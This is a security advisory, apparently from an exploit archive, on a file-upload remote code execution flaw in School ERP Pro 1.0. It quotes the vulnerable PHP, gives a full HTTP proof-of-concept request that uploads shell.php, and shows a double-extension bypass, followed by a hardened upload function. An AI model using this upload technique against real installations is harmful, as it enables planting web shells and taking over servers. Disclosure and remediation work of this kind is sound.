School ERP Pro 1.0 Remote Code Execution

2020.04.30
Credit: Besim Altinok
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: School ERP Pro 1.0 - Remote Code Execution
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description
-------------------------------------------
A student can send a message to the admin with an attachment. Because neither the file name nor the extension of that attachment is validated, the student can upload a PHP file to the server and execute code on it.

------------------------------------
*Vulnerable code - 1: (for student area) - sendmail.inc.php*
- Student user can send a message to the admin with an attachment
------------------------------------
$image_file = basename($_FILES['newimage']['name'][$i]);
$ext=explode(".",$_FILES['newimage']['name'][$i]);
$str=date("mdY_hms");
//$t=rand(1, 15);
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];
$updir = "images/messagedoc/";
$dest_path = $updir.$new_thumbname;
$up_images[$i] = $dest_path;
$srcfile = $_FILES['newimage']['tmp_name'][$i];
@move_uploaded_file($srcfile, $dest_path);
$ins_arr_prod_images = array(
    '`es_messagesid`' => $id,
    '`message_doc`' => $new_thumbname
);
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);

---------------------------------------------------
*PoC of the Remote Code Execution*
---------------------------------------------------
POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin
Content-Type: multipart/form-data; boundary=---------------------------2104557667975595321153031663
Content-Length: 718
DNT: 1
Connection: close
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c
Upgrade-Insecure-Requests: 1

-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="subject"

DEDED
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="message"

<p>DEDED</p>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"
Content-Type: text/php

<?php phpinfo(); ?>
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="filecount[]"

1
-----------------------------2104557667975595321153031663
Content-Disposition: form-data; name="submit_staff"

Send
-----------------------------2104557667975595321153031663--

------------------------------------
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*
- Admin user can update the user profile photo
------------------------------------
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {
    $ext = explode(".",$_FILES['pre_image']['name']);
    $str = date("mdY_hms");
    $new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
    $updir = "images/student_photos/";
    $uppath = $updir.$new_thumbname;
    move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);
    $file = $new_thumbname;

------------------------------------
Bypass Technique:
------------------------------------
$_FILES['pre_image']['name'];  --> shell.php.png
$ext = explode(".",$_FILES['pre_image']['name']);
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];
$ext[0] --> shell
$ext[1] --> php
lastfilename --> st_date_shell.php
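Both vulnerable snippets above share the same defect: the stored file name is built from explode(".", ...)[1], so a double extension such as shell.php.png keeps "php" as the saved extension, and the attacker controls the rest of the name. The following is an added example, not the vendor's code, of how the student-attachment handler in sendmail.inc.php could be hardened; the function name store_attachment, the allow-list and the call site are assumptions for illustration.

```php
<?php
// Added example, not the vendor's code: hardened replacement for the
// attachment-saving logic in sendmail.inc.php (names are assumptions).
const ALLOWED_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'pdf'  => 'application/pdf',
];

// Validate one uploaded file and store it under a server-chosen name.
// Returns the stored file name, or null if the upload is rejected.
function store_attachment(array $file, string $updir): ?string
{
    // Reject anything that did not arrive through a genuine HTTP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // Use only the LAST extension. explode(".", ...)[1] on "shell.php.png"
    // gives "php"; pathinfo() gives "png". Compare case-insensitively.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }

    // Check the file content, not the client-supplied Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_TYPES[$ext]) {
        return null;
    }

    // Server-generated name: no user-controlled characters reach the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($updir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);
    return $name;
}

// Usage in the per-file loop of sendmail.inc.php (assumed call site):
// $stored = store_attachment([
//     'name'     => $_FILES['newimage']['name'][$i],
//     'tmp_name' => $_FILES['newimage']['tmp_name'][$i],
//     'error'    => $_FILES['newimage']['error'][$i],
// ], 'images/messagedoc/');
```

The same change applies to pre-editstudent.inc.php. As defence in depth, the upload directories (images/messagedoc/ and images/student_photos/) should be served with script execution disabled, so that any future validation bypass yields a stored file rather than code execution.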


Copyright 2020, cxsecurity.com